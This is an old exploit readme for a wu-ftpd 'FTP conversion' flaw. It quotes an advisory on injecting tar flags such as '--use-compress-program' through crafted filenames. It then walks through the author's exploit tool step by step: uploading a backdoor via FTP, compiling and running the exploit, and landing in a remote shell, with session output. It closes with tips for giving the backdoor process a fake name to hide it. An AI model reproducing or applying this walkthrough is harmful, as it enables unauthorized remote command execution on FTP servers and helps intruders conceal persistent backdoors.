              WuFtp Remote/Local Exploit by wildcoyote@coders-pt.org

  Tested On:

  It must be stated here that this vulnerability is quite cross platform in
  that it is possible for FTP site administrators running wu-ftpd on any
  operating system to have configured FTPD in this manner. However it is
  generally more prevalant on Linux installations.

  This vulnerability was verified against the following configuration:
	
      RedHat (5.2, 6.0, 6.1)
      anonftp package version 2.8.1
      wu-ftpd (2.4.2, 2.5.0, 2.6.0)

  Advisorie: (by suid@suid.kg)

  There exists a vulnerability with certain configurations of certain
  ftp daemons with which users with a valid ftp only  acccount  on  a
  system may execute arbitrary commands (including binaries supplied by
  themselves). There also exists the possibilty that anonymous ftp users
  may execute arbitrary commands (also including binaries supplied by
  themselves).

  -> To be more exactly... <-

  FTP Conversion is the name given to the process whereby a user can
  convert/archive/compress data on the fly when retrieving files from
  a FTP server. This is done when the FTP user requests a filename and
  appends .tar/.tar.gz/.Z/.gz to the filename. The FTP then opens a pipe
  through the requested binary (/bin/tar for example) and sends the file
  through this pipe to the user.

  Vulnerability:

  If a user with intent crafts a filename beginning with a '-' sign it is
  possible to pass arbitrary flags to the command invoked by FTPD. If the
  user also includes spaces in this filename, they may pass further arguments.
  Modern tar implementations include some fairly interesting arguments. For
  the purposes of lftpdthis advisory I will only detail one. 
	
  From the tar(1) man page:

    --use-compress-program PROG
      filter the archive through PROG (which must accept -d)

  So it can be seen quite obviously that the flag:

     --use-compress-program=id

  will invoke the id command as a compression program for tar to filter
  through, obviously failing in the process, but trying nonetheless.
  Using this mechanism it is possible to invoke any command in the path.
  It is also, as mentioned previously, possible to pass those commands
  further arguments.

  End of advisorie by suid@suid.kg

  My findings and my code...

  I used RedHat 6.0 Kernel 2.2.5-15

  I dont have anonftp installed on my redhat box so i could only try my
  code as a "normal" user :]

  What i found was that...

   a) the backdoor's priviliges were'my user'ones...
   b) i think that this bug will ONLY happen if you have the anonftp package
      installed! Still have to check! :|
 
  Either way...the code was run by the daemon (but...it surely'suided to my
  normal user before :P (off course))
  The question is...what will it do if you use my code with a anonymous
  account? ;) What user will it 'suid' to run tha code? :P
  -> There is no anonymous user account on the box <-
  PUFF! According to the advisorie, and common sens, r00t!
  (or the own3r of the daemon running the wu.ftpd)

  Conclusion:

  Like i said..i dont know if i just have my box "well" configured...or if it
  doesnt work on a normal user...either way...TEST IT! :]

  How to use this:

  [wildcoyote@userfriendly wuXploit]$ ls -l
  total 13
  -rw-r--r--   1 wildcoyo wildcoyo     1473 Jun 27 18:22 backdoor.c <- evil BD
  -rw-rw-r--   1 wildcoyo wildcoyo       86 Jun 27 18:29 own.sh     <- script
  -rwxr-xr-x   1 wildcoyo wildcoyo     7037 Jun 27 19:29 readme.txt <- Thiz file
  -rwxr-xr-x   1 wildcoyo wildcoyo     5661 Jun 27 19:28 wuXploit.c <- tha c0d3
  [wildcoyote@userfriendly wuXploit]$

  All you have to do is:

  a) Upload the files (anonymous account/normal user)

  [wildcoyote@userfriendly wuXploit]$ ftp biatx
  Connected to biatx.userfriendly.
  220 biatx.userfriendly FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready.
  Name (biatx:wildcoyote): wildcoyote
  331 Password required for wildcoyote.
  Password:
  230 User wildcoyote logged in.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  ftp> cd /tmp
  250 CWD command successful.
  ftp> put own.sh
  local: own.sh remote: own.sh
  200 PORT command successful.
  150 Opening BINARY mode data connection for own.sh.
  226 Transfer complete.
  86 bytes sent in 0.0158 secs (5.3 Kbytes/sec)
  ftp> put backdoor.c
  local: backdoor.c remote: backdoor.c
  200 PORT command successful.
  150 Opening BINARY mode data connection for backdoor.c.
  226 Transfer complete.
  1473 bytes sent in 0.00749 secs (1.9e+02 Kbytes/sec)
  ftp> quit
  221-You have transferred 1559 bytes in 2 files.
  221-Total traffic for this session was 2175 bytes in 2 transfers.
  221-Thank you for using the FTP service on biatx.userfriendly.
  221 Goodbye.
  
  b) Compile the c0d3
 
  Note: Ignore any warnings when compiling the code :]

  [wildcoyote@userfriendly wuXploit]$ cc wuXploit.c -o wuXploit
  [wildcoyote@userfriendly wuXploit]$
  
  c) Execute the c0d3

  [wildcoyote@userfriendly wuXploit]$ ./wuXploit

  WuFtpd Remote/Local Exploit by wildcoyote@coders-pt.org

  Sintaxe: ./wuXploit <login> <password> <dir> <host> [wuftp port] [backdoor port]
  Example:

   -> If you have a account on tha box <-
      ./wuXploit wildcoyote my_password /tmp biatx.userfriendly
   -> Anonymous access on tha box <-
      ./wuXploit ftp ftp /incoming 192.168.0.2

  Use only the backdoor port argument if you changed backdoor.c!
  Greetz to tha world :]

  [wildcoyote@userfriendly wuXploit]$ ./wuXploit wildcoyote password /tmp biatx

  WuFtpd Remote/Local Exploit by wildcoyote@coders-pt.org

  Trying to connect to biatx[21]...SUCCESSFULL
  Sending username (wildcoyote)...DONE
  Sending password (**********)...DONE
  SYST...DONE
  TYPE I...DONE
  Changing dir to /tmp...DONE
  Setting up'evil'code :[ ...DONE
  Compiling/Running backdoor...DONE
  Let's delete the EVIL'entry :[ ...DONE
  Oh k! It's a WRAP :D
  Checking if tha backdoor is up...
  Connecting to biatx [5343]...SUCCESS
  Tha backdoor is running! ;)
  Dr@@ping you to tha own3d shell...
  Start typing dewd ;)
  id
  uid=500(wildcoyote) gid=500(wildcoyote) groups=500(wildcoyote)

  ls -l
  total 19
  -rwxr-xr-x   1 wildcoyo wildcoyo    13572 Jan  1 00:41 backdoor
  -rw-r--r--   1 wildcoyo wildcoyo     1215 Jan  1 00:41 backdoor.c
  drwx------   2 wildcoyo wildcoyo     1024 Jun 25  2000 orbit-wildcoyote
  -rw-rw-r--   1 wildcoyo wildcoyo       86 Jan  1 00:41 own.sh

  exit
  The connection was closed!
  Exiting...

  [wildcoyote@userfriendly wuXploit]$

  Just one more thing...you can give a fake name for the process running
  the backdoor :] (while you don't connect to it, when you connect, it will 
  name itself "sh")
  To do so just...

  [wildcoyote@userfriendly wuXploit]$ pico backdoor.c
  <line 18 of backdoor.c>
  #define DEFINED_EXCUSE_FOR_A_BACKDOOR "rpc.mountd" <-- define fake name here

  And exit pressing F2 or ^X :P
                                        regardz, wC (wildcoyote@coders-pt.org)
